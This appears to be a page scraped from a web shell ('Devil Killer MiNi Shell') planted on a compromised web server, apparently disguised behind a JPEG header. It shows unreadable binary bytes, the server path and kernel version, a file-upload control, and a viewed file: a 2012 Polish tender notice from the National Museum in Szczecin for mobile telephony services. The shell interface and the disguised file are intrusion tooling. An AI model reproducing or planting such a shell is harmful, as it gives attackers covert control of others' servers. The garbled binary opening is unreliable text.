JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120924/362164-N-2012.html

<p class="kh_header"><b>Szczecin: Świadczenie usług telefonii komórkowej na potrzeby Muzeum Narodowego w Szczecinie</b><br>
<b>Numer ogłoszenia: 362164 - 2012; data zamieszczenia: 24.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Szczecinie , ul. Staromłyńska 27, 70-561 Szczecin, woj. zachodniopomorskie, tel. 091 4315200, faks 091 4315204.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telefonii komórkowej na potrzeby Muzeum Narodowego w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej dla potrzeb Muzeum Narodowego w Szczecinie, w okresie 24 miesięcy od dnia zawarcia umowy, dostawa fabrycznie nowych aparatów telefonicznych, sprzętu komputerowego i kart SIM, z zachowaniem  obecnie posiadanych numerów telefonów funkcjonujących zarówno w sieci obecnego operatora telefonii komórkowej, jak i telefonii stacjonarnej.
2.	Świadczone usługi mają zapewnić łączność głosową, usługi tekstowe SMS, usługi multimedialne MMS, usługi transmisji danych i dostępu do Internetu, na terenie Polski, Unii Europejskiej oraz poza nią.
3.	Zamówienie obejmuje dostarczenie 114 kart SIM, 110 aparatów telefonicznych wraz z akcesoriami, 1. zestaw głośnomówiący oraz 4 komputery wraz z akcesoriami  zgodnie z wymaganiami specyfikacji technicznych określonych w załączniku nr 6 do SIWZ  specyfikacje techniczne od nr 1 do nr 8 . Zamawiający podaje w załączniku nr 7 do SIWZ informacje o aktualnym ruchu telefonicznym w sieciach stacjonarnych oraz komórkowych, które będą służyły do wyliczenia wartości składanych ofert i w załączniku nr 8 wykaz posiadanych numerów.
4.	Realizacja umowy będzie polegała na:
4.1	Jednorazowym przejęciu 99 numerów telefonów stacjonarnych, aktualnie wykorzystywanych przez Zamawiającego.
4.2	Przejęciu jednego numeru komórkowego, aktualnie wykorzystywanego przez Zamawiającego. Koniec czasu określonego umowy minął 22 lipca 2012 r. 
4.3	Uruchomieniu 10 nowych numerów telefonicznych
4.4	Świadczeniu usług telefonii komórkowej przez okres do wyczerpania środków finansowych przeznaczonych na ten cel t. j. do wartości zamówienia ustalonej w ofercie cenowej wykonawcy.
4.5	Uruchomieniu 4 nowych kart do podłączeń internetowych.
5.	Zamawiający wymaga aby:
5.1	Kwota abonamentu miesięcznego za poszczególne aktywacje nie zawierała pakietów minut.
5.2	Taryfikacja połączeń głosowych była jednosekundowa, od pierwszej sekundy połączenia, bez opłaty za inicjację połączenia.
5.3	Stawka za 1 minutę połączenia telefonicznego była jednolita i stała, czyli niezależna od pory dnia lub tygodnia.
5.4	Stawka za wysłanie wiadomości SMS do wszystkich krajowych sieci komórkowych i stacjonarnych była taka sama niezależnie od tego czy usługa będzie wykonywana do własnej sieci Wykonawcy czy też do sieci innych operatorów,
5.5	Stawka za wiadomości MMS do wszystkich krajowych sieci komórkowych była taka sama niezależnie od tego czy usługa będzie wykonywana do własnej sieci Wykonawcy czy też do sieci innych operatorów, 
5.6	Koszty przeniesienia numeracji od obecnego operatora do sieci Wykonawcy, były pokryte przez Wykonawcę.,
5.7	Dostawa i aktywacja kart SIM w sieci Wykonawcy była bezpłatna,
5.8	Aktywacja i dezaktywacja usług poczty głosowej przez użytkownika była bezpłatna, jak również bezpłatne były połączenia z pocztą głosową w ramach połączeń krajowych,
5.9	Proces przeniesienia aktualnie wykorzystywanych przez Zamawiającego numerów od obecnego operatora, przeprowadzony został przez Wykonawcę na podstawie odpowiednich pełnomocnictw.
5.10	Gwarancje na wszystkie dostarczone aparaty telefoniczne udzielone były na okres min. 24 miesięcy, a na czas przebywania uszkodzonego aparatu telefonicznego w serwisie, Wykonawca zapewnił aparat zastępczy od momentu zgłoszenia uszkodzenia do Wykonawcy do momentu odebrania naprawionego aparatu telefonicznego . Wykonawca wskaże adres na terenie Szczecina, pod który należy dostarczyć uszkodzone aparaty telefoniczne.
5.11	Wykonawca zapewnił zasięg sieci komórkowej we wszystkich budynkach Zamawiającego, w taki sposób aby możliwe było bezproblemowe korzystanie z usług Wykonawcy we wszystkich pomieszczeniach. 
5.12	Budynki Zamawiającego w Szczecinie: ul. Staromłyńska 27, ul. Staromłyńska 1, Wały Chrobrego 3, Ks. Mściwoja II 8.				
5.13	Wykonawca dostarczył do siedziby Zamawiającego karty SIM, aparaty telefoniczne wraz z akcesoriami oraz komputery  objęte zamówieniem, nie później, niż 7 dni przed przejęciem numerów do sieci Wykonawcy i rozpoczęciem świadczenia usług.
5.14	Dostarczone terminale nie posiadały blokad SIM LOCK.
5.15	Wykonawca w ciągu trzech dni od podpisania umowy zobowiązany jest dostarczyć:
5.15.1	po dwa różne aparaty telefoniczne dla  specyfikacji technicznych nr 3, nr 5, nr 6,
5.15.2	 po jednym aparacie telefonicznym do specyfikacji nr 1, nr 2 i nr 4 . Zamawiający dopuszcza uzgodnienie telefonów opisanych w specyfikacji nr 1 i nr 2 na podstawie opisu technicznego ze zdjęciem, 
5.16	Po jednym modelu komputera do specyfikacji nr 7 i nr 8, 
5.17	Zamawiający zobowiązuje się w ciągu 2 dni roboczych dokonać wyboru jednego modelu do każdej kategorii i uzgodnić przedstawione modele.
5.18	Po otrzymaniu decyzji wyboru modelów aparatów telefonicznych i komputerów Wykonawca zobowiązuje się dostarczyć 110 sztuk fabrycznie nowych aparatów telefonicznych i 1 fabrycznie nowy samochodowy zestaw głośnomówiący - właściwy dla modelu telefonu w opisanego w zał. Nr 6 , specyfikacja techniczna nr  5 i 4 komputery zgodnie z wyborem Zamawiającego. 
5.19	Zamawiający wymaga,  aby wszystkie aparaty telefoniczne  wraz z baterią i ładowarką oraz kablem USB, wykonawca dostarczył w cenie 1 zł netto. Dostarczone telefony i akcesoria mają być fabrycznie nowe, zapakowane w oryginalne opakowania , w pełni sprawne i nie mogą nosić śladów użytkowania. Wykonawca zaoferuje takie modele aparatów telefonicznych, które zostały wprowadzone na rynek polski nie wcześniej niż w 2010 r. Dostarczone urządzenia muszą posiadać oznakowanie produktu znakiem CE. 
5.20	Zamawiający dopuszcza brak kabla USB jeżeli telefon nie jest wyposażony w możliwość ładowania lub komunikacji przez port USB.
5.21	Operacja przeniesienia numerów telefonów do sieci Wykonawcy, nie może  powodować przerw w łączności telefonicznej w czasie pracy Zamawiającego. Data przeniesienia numeracji musi być uzgodniona z Zamawiającym. 
5.22	Zamawiający wymaga, aby komputery wraz z baterią i ładowarką wykonawca dostarczył w cenie 1 zł netto. Dostarczone komputery mają być fabrycznie nowe, zapakowane w oryginalne opakowania, w pełni sprawne i nie mogą nosić śladów użytkowania. Wykonawca zaoferuje takie modele komputerów, które zostały wprowadzone na rynek polski nie wcześniej niż w 2010 roku. Dostarczone urządzenia muszą posiadać oznakowanie produktu znakiem CE.

6.	Usługi dodatkowe:
6.1	W ramach świadczonych usług, Wykonawca zapewni możliwość bezpłatnego administrowania wszystkimi usługami poprzez aplikację on-linelub w przypadku niektórych usług poprzez dedykowanego opiekuna, dzięki której Zamawiający będzie mógł wykonywać: billingi z poszczególnych aktywacji, oraz zarządzać usługami: blokowanie i odblokowywanie usług oraz limitowanie połączeń do wybranych grup numerów specjalnych telefonicznych, blokowanie połączeń wychodzących i przychodzących, w tym również do i od konkretnych numerów oraz międzynarodowych, blokowanie możliwości wysyłania wiadomości SMS i MMS, podgląd bieżących kosztów generowanych przez poszczególne numery, informacje na temat ilości wysłanych i odebranych danych, w zakresie nie wymagającym składania pisemnych zleceń. W ramach wynagrodzenia Wykonawca zapewni szkolenie z obsługi aplikacji dla 2 osób wyznaczonych przez Zamawiającego. Szkolenie odbędzie się w siedzibie Zamawiającego.
6.2	W ramach świadczonych usług, Wykonawca utworzy grupę firmową wszystkich aktywacji należących do Zamawiającego, wewnątrz której wszystkie połączenia będą bezpłatne. Abonament za usługę grupy firmowej, określony będzie w formularzu ofertowym  (zał. nr 1 do SIWZ). W ramach grupy firmowej, Wykonawca umożliwi nawiązywanie połączeń z wykorzystaniem numerów skróconych. Wymagany zakres numeracji skróconej od: 200 do 310. Dopuszcza się stosowanie numerów skróconych czterocyfrowych, w zakresie od 5200 do 5310.  Preferuje się aby numeracja skrócona pokrywała się jednocześnie z ostatnimi cyframi numeracji komórkowej jak i stacjonarnej.
6.3	W ramach świadczonych usług Wykonawca zapewni możliwość korzystania z dwóch numerów telefonów: komórkowego oraz stacjonarnego w ramach jednej aktywacji, bez konieczności przełączania się pomiędzy numerami (działanie i dostęp do obu numerów równolegle w tym samym czasie). W strefie działania usługi, taryfikacja połączeń przychodzących na numery stacjonarne dla abonentów zewnętrznych, będzie traktowana jak za połączenie na telefony stacjonarne według cennika operatora, z którego sieci realizowane jest to połączenie, również dla abonentów dzwoniących spoza granic RP. Taryfikacja połączeń wykonywanych przez Zamawiającego poprzez numer stacjonarny na inne numery stacjonarne, oraz stawka abonamentowa za usługę określona zostanie przez Wykonawcę w formularzu ofertowym - załącznik nr 1 do SIWZ. Strefa funkcjonowania numerów stacjonarnych, musi obejmować obszar o promieniu co najmniej 500 metrów i środku pokrywającym się ze wskazanym przez Zamawiającego adresem świadczenia usługi (Zamawiający przewiduje utworzenie 4 stref).  W strefie numerów stacjonarnych połączenia z numerami stacjonarnymi będą domyślnie wykonywane z numerów stacjonarnych.
6.4	W ramach świadczonych usług, wykonawca umożliwi korzystanie z transmisji danych do sieci Internet w technologiach WAP, GPRS, GSM 3G, w zryczałtowanej  opłacie, w przypisanych do abonamentów pakietach minimum 2GB transferu danych. Naliczanie transmisji danych z dokładnością do 1 kB. Przewiduje się uruchomienie pakietów internetowych na 2 (dwóch) aktywacjach.
6.5	Wykonawca zapewni możliwość bezpłatnego blokowania na wniosek użytkownika lub Zamawiającego SMS-ów z reklamami, a także informacjami operatora na temat aktualnych kosztów i realizacji płatności,
6.6	Wykonawca zapewni obsługę Zamawiającego przez osobę wskazaną do bezpośredniego kontaktu w sprawach wynikających z realizacji przedmiotu umowy,
6.7	Wykonawca zapewni bezpłatne duplikaty kart SIM w przypadku ich utraty lub uszkodzenia,
6.8	Wykonawca zapewni bezpłatną blokadę kart SIM na wniosek użytkownika / Zamawiającego (przykładowo w razie utraty telefonu, uszkodzenia lub zagubienia karty SIM),
6.9	Wykonawca zapewni bezpłatną prezentację numeru własnego oraz  numeru dzwoniącego (niezastrzeżonego) z możliwością nieodpłatnego wyłączenia tej funkcji przez użytkownika po stronie Zamawiającego,
6.10	W ramach świadczonych usług wykonawca umożliwi korzystanie z transmisji danych do sieci Internet w technologiach GPRS, GSM 3G w zryczałtowanej opłacie na oddzielnych kartach SIM przeznaczonych do transmisji danych, w abonamentach minimum 4 GB transferu miesięcznie. Naliczanie transmisji danych z dokładnością do 1 kB.
6.11	Szczegółowe wykazy indywidualnych rozmów ( bilingi) oraz zbiorcze zestawienie minut Wykonawca sporządza nieodpłatnie w wersji elektronicznej i papierowej i przekazuje je Zamawiającemu na koniec miesięcznego okresu rozliczeniowego.
7.	Wynagrodzenie należne Wykonawcy z tytułu realizacji przedmiotu niniejszej umowy w całym okresie jej obowiązywania uzależnione jest od rzeczywistej ilości usług wynikającej z zakresu rzeczowego przedmiotu umowy. 
8.	Miesięczne wynagrodzenie Wykonawcy za wykonany przedmiot umowy będzie obliczone jako suma abonamentów i  kosztów zrealizowanych  połączeń w ciągu miesięcznego okresu rozliczeniowego ze wszystkich numerów abonenckich Zamawiającego.
9.	Nie objęte ofertą przetargową stawki świadczonych przez Wykonawcę usług i pobieranych opłat, będą realizowane w oparciu o cennik Wykonawcy przynależny do oferty biznesowej, według cen i zasad wynikających z najwyższego biznesowego planu taryfowego Wykonawcy, obowiązującego w dniu złożenia oferty. Nazwę, cennik i regulamin odpowiedniego planu taryfowego, Wykonawca określi w zawieranej z Zamawiającym umowie, przy czym wykreślone zostaną stawki, terminy i zasady współpracy będące przedmiotem oferty Wykonawcy w ramach niniejszego postępowania przetargowego, oraz co do których Zamawiający określił wymagania w niniejszej SIWZ, wraz z załącznikami.
10.	Zamawiający dopuszcza w czasie trwania umowy obniżenie cen jednostkowych w połączeniach międzynarodowych za pomocą właściwych dla wybranego Wykonawcy usług. Obniżenie cen jednostkowych w połączeniach międzynarodowych nie powoduje zmiany wartości zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 PZP do wartości 50% udzielonego zamówienia. Usługi uzupełniające będą rozliczane wg cen jednostkowych ujętych w ofercie cenowej wykonawcy złożonej w wyniku niniejszego postępowania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.20.00-5, 32.25.00.00-0, 32.41.21.10-8, 31.71.21.12-8, 32.25.20.00-4, 30.21.31.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
22.1	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.000,00 zł. (słownie: dwa tysiące złotych,   00/100).
22.2	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy. 
22.3	Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy:
74 1500 1722 1217 2001 2158 0000. 
na adres: Kredyt Bank S.A. II Oddz. w Szczecinie, ul. Starzyńskiego 1.
22.2	UWAGA: Za datę wniesienia wadium uważa się datę wpływu środków na wskazany rachunek bankowy Zamawiającego. W tytule przelewu wadium wnoszonego w pieniądzu należy wskazać oznaczenie identyfikujące postępowanie, tak aby przyporządkowanie wadium do danego postępowania nie budziło żadnych wątpliwości.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać wpis do rejestru przedsiębiorców telekomunikacyjnych uprawniający do prowadzenia działalności gospodarczej w zakresie działalności telekomunikacyjnej, o którym mowa w art. 10 ust. 1 i art. 11 ustawy z dnia 16 lipca 2004 r. Prawo telekomunikacyjne. (Dz. U. z 2004r. Nr 171 poz.1800 z późn. zm.) oraz załączyć do oferty Zaświadczenie Prezesa UKE o wpisie do rejestru przedsiębiorców telekomunikacyjnych uprawniający do prowadzenia działalności gospodarczej w zakresie działalności telekomunikacyjnej, wydane na podstawie art. 11 ustawy z dnia 16 lipca 2004 r. Prawo telekomunikacyjne. (Dz. U. z 2004r. Nr 
171 poz. 1800 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">potwierdzenie spełnienia wymagań technicznych oferowanego sprzętu telefonicznego wg wzoru na załączniku nr 6, specyfikacje 1 - 8,</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści umowy, zmiany umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej oraz innych okoliczności, które uniemożliwiłyby terminowe wykonanie zobowiązań.  Zmiany mogą w szczególności polegać na zmianie terminów wykonywania zamówienia lub też zmianie liczby użytkowanych numerów w przypadku zmiany liczbowej personelu Zamawiającego.
Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Szczecinie, ul. Staromłyńska 27, 70-561 Szczecin.</p>
